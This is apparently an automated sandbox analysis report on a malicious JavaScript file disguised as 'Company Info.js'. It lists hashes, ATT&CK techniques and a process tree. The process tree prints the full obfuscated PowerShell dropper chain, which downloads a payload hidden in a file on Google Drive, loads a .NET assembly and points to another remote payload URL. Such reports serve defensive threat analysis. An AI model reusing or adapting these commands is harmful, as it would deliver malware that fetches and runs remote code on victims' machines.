397c1cb5536c84ebaf2ab511cf4183be4364ed6619c0bfaf2ac816a99ec49a4a

General

Target

Collaboration Request/Company Info.js
Size

15KB
MD5

03cf8621c289fbd13ebf3f14837da3d1
SHA1

61239e9eeb422eb59306f354546fcd8317a2ce69
SHA256

4d8fd3bbbcf0f1ab58cbef0b189ed1e3abbf6ff523c0b478f80fffc2aa36ba53
SHA512

c1a3483d30f211bd5d17feaa7081c8e75353cf3b556b4bbb86c611b553db8a580c24bcb52c8c0a8c15df20100da4b91aa6e99563466789eee7dedbe1a1513d8a
SSDEEP

384:zkICeaCPI9hUmMLVmdZyukUQqhHdHviwDv:QICjC6hDYmdZKUQqh9PiwDv

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	1332	wscript.exe
5	1332	wscript.exe
19	1412	powershell.exe
22	1412	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4608	powershell.exe
1412	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	wscript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
18	drive.google.com
19	drive.google.com

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	5	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4608	powershell.exe
4608	powershell.exe
1412	powershell.exe
1412	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4608	powershell.exe
Token: SeDebugPrivilege	1412	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1332 wrote to memory of 4608	1332	wscript.exe	87
PID 1332 wrote to memory of 4608	1332	wscript.exe	87
PID 4608 wrote to memory of 1412	4608	powershell.exe	89
PID 4608 wrote to memory of 1412	4608	powershell.exe	89

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Collaboration Request\Company Info.js"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABzAEgAZQBsAEwAaQBEAFsAMQBdACsAJABTAEgARQBMAEwAaQBEAFsAMQAzAF0AKwAnAHgAJwApACgAKAAnADUAbgB2AGkAbQBhAGcAZQBVAHIAbAAgAD0AIABBAFcAcABoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AMQBBAEkAVgBnAEoASgBKAHYAMQBGADYAdgBTADQAcwBVAE8AeQBiAG4ASAAtAHMARAB2AFUAaABCAFkAdwB1AHIAQQBXAHAAOwA1AG4AdgB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsANQBuAHYAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AJwArACcAIAA1AG4AdgB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3ACcAKwAnAG4AbABvAGEAZABEAGEAdABhACgANQBuAHYAaQBtAGEAZwBlAFUAcgBsACkAOwA1AG4AdgBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4AJwArACcARwBlAHQAUwB0AHIAaQBuAGcAKAA1AG4AdgBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwA1AG4AdgBzAHQAYQByAHQARgBsAGEAZwAgAD0AJwArACcAIABBAFcAcAA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AEEAVwBwADsAJwArACcANQBuAHYAZQBuAGQARgBsAGEAZwAgAD0AIABBAFcAcAA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AQQBXAHAAOwA1AG4AdgBzAHQAYQByAHQASQBuAGQAZQB4ACcAKwAnACAAPQAgADUAbgB2AGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoADUAbgB2AHMAdABhAHIAdABGAGwAYQBnACkAOwA1AG4AdgBlAG4AZABJAG4AZABlAHgAJwArACcAIAA9ACAANQBuAHYAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwAnACsAJwBmACcAKwAnACgANQBuAHYAZQBuAGQARgBsAGEAZwApADsANQBuAHYAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAA1AG4AdgBlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgADUAbgAnACsAJwB2AHMAdABhAHIAdABJAG4AZABlAHgAOwA1AG4AdgBzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAANQBuAHYAcwB0AGEAJwArACcAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACcAKwAnADUAbgB2AGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgADUAbgB2AGUAbgBkAEkAbgBkAGUAeAAgAC0AIAA1AG4AdgBzAHQAYQByAHQASQBuAGQAZQB4ADsANQBuAHYAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAA1ACcAKwAnAG4AdgBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgANQBuAHYAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAANQBuAHYAYgBhAHMAJwArACcAZQA2ADQATABlAG4AZwB0AGgAKQA7ADUAbgB2AGIAYQBzAGUANgA0AFIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoADUAbgB2AGIAYQBzAGUANgA0AEMAbwBtACcAKwAnAG0AYQBuAGQALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApACAARwBSAGMAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAANQBuACcAKwAnAHYAXwAgAH0AKQBbAC0AMQAuAC4ALQAoADUAbgB2AGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBMAGUAbgBnAHQAaAApAF0AOwA1AG4AdgAnACsAJwBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbACcAKwAnAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgANQBuAHYAYgBhAHMAZQA2ADQAUgBlAHYAZQByACcAKwAnAHMAZQBkACkAOwA1AG4AdgBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoADUAbgB2AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwA1AG4AdgB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAQQBXAHAAVgBBACcAKwAnAEkAQQBXAHAAKQA7ADUAbgB2AHYAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKAA1AG4AdgBuAHUAbABsACwAIABAACgAQQBXAHAAdAB4AHQALgAyAGkAcgBvAC8AdgB3AGUAbgAvAHIAYgAuAG0AbwBjAC4ANQAwADEAcgBlAC4AbwBtAGwALwAvADoAcwBwAHQAdABoAEEAVwBwACwAIABBAFcAJwArACcAcABkAGUAcwBhAHQAaQB2AGEAZABvAEEAVwBwACwAIABBAFcAcABkAGUAcwBhAHQAaQB2AGEAZABvAEEAVwBwACwAIABBAFcAcABkAGUAcwBhAHQAaQB2AGEAZABvAEEAVwBwACwAIABBAFcAcABDAGEAcwBQAG8AbABBAFcAcAAsACAAQQBXAHAAZABlAHMAJwArACcAYQB0AGkAdgBhAGQAbwBBAFcAcAAsAEEAVwBwAGQAZQBzAGEAdABpAHYAYQBkAG8AQQBXAHAALABBAFcAcABkAGUAcwBhAHQAaQB2AGEAZABvAEEAVwBwACwAQQBXAHAAVQBSAEwAQQBXAHAALAAgACcAKwAnAEEAVwBwAEMAOgB0AFUAWQBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAdABVAFkAQQBXAHAAJwArACcALABBAFcAcABkAGEAYwB0AGkAbABvAG0AYQBuAGMAaQBhAEEAVwAnACsAJwBwACwAQQBXAHAAagBzAEEAVwBwACwAQQBXAHAAMQBBAFcAcAAsAEEAVwBwADEAQQBXAHAAKQApADsAJwApAC4AcgBFAHAATABBAGMAZQAoACgAWwBDAEgAYQBSAF0AMQAxADYAKwBbAEMASABhAFIAXQA4ADUAKwBbAEMASABhAFIAXQA4ADkAKQAsACcAXAAnACkALgByAEUAcABMAEEAYwBlACgAKABbAEMASABhAFIAXQA3ADEAKwBbAEMASABhAFIAXQA4ADIAKwBbAEMASABhAFIAXQA5ADkAKQAsAFsAcwBUAFIAaQBOAEcAXQBbAEMASABhAFIAXQAxADIANAApAC4AcgBFAHAATABBAGMAZQAoACgAWwBDAEgAYQBSAF0ANQAzACsAWwBDAEgAYQBSAF0AMQAxADAAKwBbAEMASABhAFIAXQAxADEAOAApACwAWwBzAFQAUgBpAE4ARwBdAFsAQwBIAGEAUgBdADMANgApAC4AcgBFAHAATABBAGMAZQAoACgAWwBDAEgAYQBSAF0ANgA1ACsAWwBDAEgAYQBSAF0AOAA3ACsAWwBDAEgAYQBSAF0AMQAxADIAKQAsAFsAcwBUAFIAaQBOAEcAXQBbAEMASABhAFIAXQAzADkAKQApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHelLiD[1]+$SHELLiD[13]+'x')(('5nvimageUrl = AWphttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwurAWp;5nvwebClient = New-Object System.Net.WebClient;5nvimageBytes ='+' 5nvwebClient.Dow'+'nloadData(5nvimageUrl);5nvimageText = [System.Text.Encoding]::UTF8.'+'GetString(5nvimageBytes);5nvstartFlag ='+' AWp<<BASE64_START>>AWp;'+'5nvendFlag = AWp<<BASE64_END>>AWp;5nvstartIndex'+' = 5nvimageText.IndexOf(5nvstartFlag);5nvendIndex'+' = 5nvimageText.IndexO'+'f'+'(5nvendFlag);5nvstartIndex -ge 0 -and 5nvendIndex -gt 5n'+'vstartIndex;5nvstartIndex += 5nvsta'+'rtFlag.Length;'+'5nvbase64Length = 5nvendIndex - 5nvstartIndex;5nvbase64Command = 5'+'nvimageText.Substring(5nvstartIndex, 5nvbas'+'e64Length);5nvbase64Reversed = -join (5nvbase64Com'+'mand.ToCharArray() GRc ForEach-Object { 5n'+'v_ })[-1..-(5nvbase64Command.Length)];5nv'+'commandBytes = ['+'System.Convert]::FromBase64String(5nvbase64Rever'+'sed);5nvloadedAssembly = [System.Reflection.Assembly]::Load(5nvcommandBytes);5nvvaiMethod = [dnlib.IO.Home].GetMethod(AWpVA'+'IAWp);5nvvaiMethod.Invoke(5nvnull, @(AWptxt.2iro/vwen/rb.moc.501re.oml//:sptthAWp, AW'+'pdesativadoAWp, AWpdesativadoAWp, AWpdesativadoAWp, AWpCasPolAWp, AWpdes'+'ativadoAWp,AWpdesativadoAWp,AWpdesativadoAWp,AWpURLAWp, '+'AWpC:tUYProgramDatatUYAWp'+',AWpdactilomanciaAW'+'p,AWpjsAWp,AWp1AWp,AWp1AWp));').rEpLAce(([CHaR]116+[CHaR]85+[CHaR]89),'\').rEpLAce(([CHaR]71+[CHaR]82+[CHaR]99),[sTRiNG][CHaR]124).rEpLAce(([CHaR]53+[CHaR]110+[CHaR]118),[sTRiNG][CHaR]36).rEpLAce(([CHaR]65+[CHaR]87+[CHaR]112),[sTRiNG][CHaR]39))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a6c9d692ed2826ecb12c09356e69cc09

SHA1
def728a6138cf083d8a7c61337f3c9dade41a37f

SHA256
a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

SHA512
2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j1djsfxh.dfa.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4608-0-0x00007FFA38723000-0x00007FFA38725000-memory.dmp

Filesize
8KB

Download
memory/4608-1-0x0000013D26730000-0x0000013D26752000-memory.dmp

Filesize
136KB

Download
memory/4608-11-0x00007FFA38720000-0x00007FFA391E1000-memory.dmp

Filesize
10.8MB

Download
memory/4608-12-0x00007FFA38720000-0x00007FFA391E1000-memory.dmp

Filesize
10.8MB

Download
memory/4608-27-0x00007FFA38720000-0x00007FFA391E1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing